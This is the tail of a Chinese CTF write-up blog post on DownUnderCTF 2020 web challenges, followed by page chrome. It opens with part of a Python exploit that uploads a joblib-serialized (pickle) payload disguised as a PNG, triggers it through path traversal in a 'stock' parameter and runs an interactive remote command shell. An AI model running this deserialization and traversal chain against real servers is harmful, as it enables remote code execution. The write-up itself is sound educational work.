class="hljs-keyword">return</span> Model()<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exec_cmd</span>(<span class="hljs-params">cmd</span>):</span><br>    <span class="hljs-comment"># 将 payload 序列化后写入文件。</span><br>    tmpfile = io.BytesIO()<br>    joblib.dump(make_payload(cmd), tmpfile)<br>    tmpfile.seek(<span class="hljs-number">0</span>)<br>    <br>    <span class="hljs-comment"># session 上传文件</span><br>    resp = session.post(<br>        url=<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;REMOTE&#125;</span>/profile-picture&#x27;</span>,<br>        files=&#123;<br>            <span class="hljs-string">&#x27;img&#x27;</span>: (<span class="hljs-string">&#x27;1.png&#x27;</span>, tmpfile)<br>        &#125;<br>    )<br>    <br>    <span class="hljs-comment"># 定位问题的位置</span><br>    <span class="hljs-keyword">assert</span> resp.ok<br>    <br>    <span class="hljs-comment"># 使运行文件中序列化的命令</span><br>    resp = session.post(<br>        url=<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;REMOTE&#125;</span>/predict&#x27;</span>,<br>        data=&#123;<br>            <span class="hljs-string">&#x27;stock&#x27;</span>: <span class="hljs-string">&#x27;../&#x27;</span> * <span class="hljs-number">16</span> + <span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;remote_path&#125;</span>/<span class="hljs-subst">&#123;uid&#125;</span>.png&#x27;</span>,<br>            <span class="hljs-string">&#x27;prices&#x27;</span>: <span class="hljs-string">&#x27;1,2&#x27;</span><br>        &#125;<br>    )<br>    <br>    <span class="hljs-comment"># 读取命令执行的结果</span><br>    resp = session.get(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;REMOTE&#125;</span>/profile-picture/<span class="hljs-subst">&#123;uid&#125;</span>&#x27;</span>)<br>    <span class="hljs-keyword">return</span> resp.text<br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    cmd = input()<br>    print(exec_cmd(cmd))<br>    print(<span class="hljs-string">&#x27;----------------------------&#x27;</span>)<br><br></code></pre></td></tr></table></figure>

<hr>
<h1 id="Design-COMP"><a href="#Design-COMP" class="headerlink" title="Design COMP"></a>Design COMP</h1><p>题目链接：<a target="_blank" rel="noopener" href="https://chal.duc.tf:30105/">https://chal.duc.tf:30105/</a></p>
<p>Come join our homepage design competition and test out your CSS skills!<br>Snippet of admin code: <a target="_blank" rel="noopener" href="https://gist.github.com/uint0/21e677a7daf177f115486b9f952037da">https://gist.github.com/uint0/21e677a7daf177f115486b9f952037da</a></p>
<p>题解链接：<a target="_blank" rel="noopener" href="https://github.com/DownUnderCTF/Challenges_2020_public/tree/master/web/design-comp">https://github.com/DownUnderCTF/Challenges_2020_public/tree/master/web/design-comp</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AE%89%E5%85%A8/">安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/14/2020%E5%B9%B410%E6%9C%8814%E6%97%A5-%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2020年10月西湖论剑CTF部分web题解</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/09/30/2020%E5%B9%B49%E6%9C%8830%E6%97%A5-%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0/">
                        <span class="hidden-mobile">解决印象笔记粘贴代码缩进混乱的问题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                

              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
    <!-- cnzz Analytics Icon -->
    <span id="cnzz_stat_icon_1279647913" style="display: none"></span>
  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  

  

  

  

  
    <!-- cnzz Analytics -->
    <script defer src="//s4.cnzz.com/z_stat.php?id=1279647913&show=pic"
            type="text/javascript"></script>
  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
